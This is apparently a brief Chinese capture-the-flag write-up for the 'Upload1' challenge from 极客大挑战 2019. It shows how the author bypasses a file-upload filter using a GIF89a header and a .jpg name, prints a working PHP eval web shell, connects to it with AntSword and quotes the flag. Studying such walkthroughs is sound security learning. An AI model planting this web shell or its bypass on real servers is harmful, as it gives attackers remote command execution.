[极客大挑战 2019]Upload1
题目
直接传马,
可以看到有前端检查和对文件内容进行检查,我们将文件名改成shell.jpg进行上传。
翻译不!黑客!您的文件包含“<?
先绕过前端验证,然后加上文件头即可上传成功
GIF89a
<script language='php'>@eval($_POST['md']);</script>上传成功
上传成功之后,没有给我们具体的存储位置,我们猜测应该是存在/upload的路径之下,然后我们试着去访问文件。
蚁剑连接读取flag
拿下flag
flag{dbbfcaab-cc3e-420b-8dc8-3711ef452ac9}